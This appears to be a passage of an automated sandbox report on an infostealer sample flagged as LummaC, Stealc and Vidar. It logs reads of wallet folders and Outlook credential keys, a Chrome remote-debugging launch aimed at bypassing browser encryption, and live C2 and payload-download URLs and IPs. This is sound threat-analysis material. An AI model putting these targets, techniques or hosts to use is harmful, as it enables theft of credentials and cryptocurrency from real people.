Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\YPSIACHYXW Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\RAYHIWGKDI
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Directory queried: C:\Users\user\Documents\FENIVHOIKN
Yara detected Credential Stealer
Source: Yara match File source: 00000017.00000003.2807718354.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2845222111.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2825273881.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2825364278.0000000000E85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2844405676.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2889037273.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2807917547.0000000000E85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2469878623.0000000001552000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.2883051277.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2469725408.000000000154E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c3e1e78f6d.exe PID: 7944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c3e1e78f6d.exe PID: 6956, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c3e1e78f6d.exe PID: 7236, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Yara detected LummaC Stealer
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c3e1e78f6d.exe PID: 7944, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c3e1e78f6d.exe PID: 6956, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: c3e1e78f6d.exe PID: 7236, type: MEMORYSTR
Source: Yara match File source: 13.2.c3e1e78f6d.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.c3e1e78f6d.exe.6b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2164783980.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.2857025061.0000000005910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.2609138087.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2160637336.0000000000751000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2897720480.0000000000F71000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2670475440.0000000000F71000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2486797329.00000000017DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2485790355.0000000000F71000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2444697974.0000000005190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2669591001.0000000000C16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1838467283.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2899998365.0000000001C32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 82b4c5cad2.exe PID: 6208, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 82b4c5cad2.exe PID: 2368, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7472, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554768 Sample: file.exe Startdate: 12/11/2024 Architecture: WINDOWS Score: 100 69 fleez-inc.sbs 2->69 99 Suricata IDS alerts for network traffic 2->99 101 Found malware configuration 2->101 103 Antivirus detection for URL or domain 2->103 105 16 other signatures 2->105 9 file.exe 36 2->9         started        14 skotes.exe 3 22 2->14         started        16 c3e1e78f6d.exe 2->16         started        18 6 other processes 2->18 signatures3 process4 dnsIp5 77 185.215.113.206, 49735, 49759, 80 WHOLESALECONNECTIONSNL Portugal 9->77 79 185.215.113.16, 49762, 49798, 80 WHOLESALECONNECTIONSNL Portugal 9->79 81 127.0.0.1 unknown unknown 9->81 57 C:\Users\user\DocumentsIIEBKJECFC.exe, PE32 9->57 dropped 59 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->59 dropped 61 C:\Users\user\AppData\Local\...\random[1].exe, PE32 9->61 dropped 67 11 other files (7 malicious) 9->67 dropped 147 Detected unpacking (changes PE section rights) 9->147 149 Attempt to bypass Chrome Application-Bound Encryption 9->149 151 Drops PE files to the document folder of the user 9->151 169 6 other signatures 9->169 20 cmd.exe 1 9->20         started        22 chrome.exe 9->22         started        83 185.215.113.43, 49781, 49794, 80 WHOLESALECONNECTIONSNL Portugal 14->83 153 Creates multiple autostart registry keys 14->153 155 Hides threads from debuggers 14->155 157 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->157 25 c3e1e78f6d.exe 1 14->25         started        29 accd68d705.exe 14->29         started        31 82b4c5cad2.exe 14->31         started        33 skotes.exe 14->33         started        63 C:\Users\...\TMZOGPKAQROXKZACD6GWC5N6Z.exe, PE32 16->63 dropped 159 Query firmware table information (likely to detect VMs) 16->159 161 Found many strings related to Crypto-Wallets (likely being stolen) 16->161 163 Tries to harvest and steal ftp login credentials 16->163 35 TMZOGPKAQROXKZACD6GWC5N6Z.exe 16->35         started        65 C:\Users\user\...\Q10LTOCEFP0KA6N46594D.exe, PE32 18->65 dropped 165 Tries to steal Crypto Currency Wallets 18->165 167 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->167 37 Q10LTOCEFP0KA6N46594D.exe 18->37         started        file6 signatures7 process8 dnsIp9 39 DocumentsIIEBKJECFC.exe 4 20->39         started        43 conhost.exe 20->43         started        71 192.168.2.4, 443, 49723, 49724 unknown unknown 22->71 73 239.255.255.250 unknown Reserved 22->73 45 chrome.exe 22->45         started        75 fleez-inc.sbs 172.67.150.243 CLOUDFLARENETUS United States 25->75 55 C:\Users\...\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe, PE32 25->55 dropped 121 Detected unpacking (changes PE section rights) 25->121 123 Query firmware table information (likely to detect VMs) 25->123 125 Tries to evade debugger and weak emulator (self modifying code) 25->125 143 2 other signatures 25->143 48 70XXT0BM2TDFAKTXCB0ILV78JWN4.exe 25->48         started        127 Modifies windows update settings 29->127 129 Disables Windows Defender Tamper protection 29->129 131 Disable Windows Defender notifications (registry) 29->131 133 Disable Windows Defender real time protection (registry) 29->133 135 Tries to detect sandboxes and other dynamic analysis tools (window names) 35->135 145 2 other signatures 35->145 137 Multi AV Scanner detection for dropped file 37->137 139 Machine Learning detection for dropped file 37->139 141 Hides threads from debuggers 37->141 file10 signatures11 process12 dnsIp13 53 C:\Users\user\AppData\Local\...\skotes.exe, PE32 39->53 dropped 107 Antivirus detection for dropped file 39->107 109 Detected unpacking (changes PE section rights) 39->109 111 Machine Learning detection for dropped file 39->111 119 4 other signatures 39->119 50 skotes.exe 39->50         started        85 plus.l.google.com 142.250.185.206, 443, 49750 GOOGLEUS United States 45->85 87 www.google.com 142.250.185.68, 443, 49739, 49740 GOOGLEUS United States 45->87 89 2 other IPs or domains 45->89 113 Multi AV Scanner detection for dropped file 48->113 115 Tries to evade debugger and weak emulator (self modifying code) 48->115 117 Hides threads from debuggers 48->117 file14 signatures15 process16 signatures17 91 Antivirus detection for dropped file 50->91 93 Detected unpacking (changes PE section rights) 50->93 95 Machine Learning detection for dropped file 50->95 97 5 other signatures 50->97
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
142.250.185.68
 www.google.com United States
15169 GOOGLEUS false
142.250.185.206
 plus.l.google.com United States
15169 GOOGLEUS false
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL false
172.67.150.243
 fleez-inc.sbs United States
13335 CLOUDFLARENETUS false
239.255.255.250
 unknown Reserved
unknown unknown false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Private

IP
192.168.2.4
127.0.0.1

Contacted Domains

Name IP Active
fleez-inc.sbs 172.67.150.243 true
plus.l.google.com 142.250.185.206 true
play.google.com 172.217.18.14 true
www.google.com 142.250.185.68 true
apis.google.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/68b591d6548ec281/softokn3.dll false
    		high
    http://185.215.113.206/ false
      		high
      thicktoys.sbs false
        		high
        http://185.215.113.43/Zu7JuNko/index.php false
          		high
          http://185.215.113.206/68b591d6548ec281/freebl3.dll false
            		high
            http://185.215.113.206/68b591d6548ec281/nss3.dll false
              		high
              https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
                		high
                faintbl0w.sbs false
                  		high
                  3xc1aimbl0w.sbs false
                    		high
                    https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 false
                      		high
                      300snails.sbs false
                        		high
                        http://185.215.113.206/68b591d6548ec281/vcruntime140.dll false
                          		high
                          https://fleez-inc.sbs/api true
                          • Avira URL Cloud: safe
                          		 unknown
                          http://185.215.113.16/mine/random.exe false
                            		high
                            http://185.215.113.206/68b591d6548ec281/sqlite3.dll false
                              		high
                              http://185.215.113.206/68b591d6548ec281/mozglue.dll false
                                		high
                                http://185.215.113.206/68b591d6548ec281/msvcp140.dll false
                                  		high
                                  http://185.215.113.16/steam/random.exe false
                                    		high
                                    http://185.215.113.206/c4becf79229cb002.php false
                                      		high
                                      https://www.google.com/async/newtab_promos false
                                        		high
                                        https://www.google.com/async/ddljson?async=ntp:2 false
                                          		high
                                          https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
                                            		high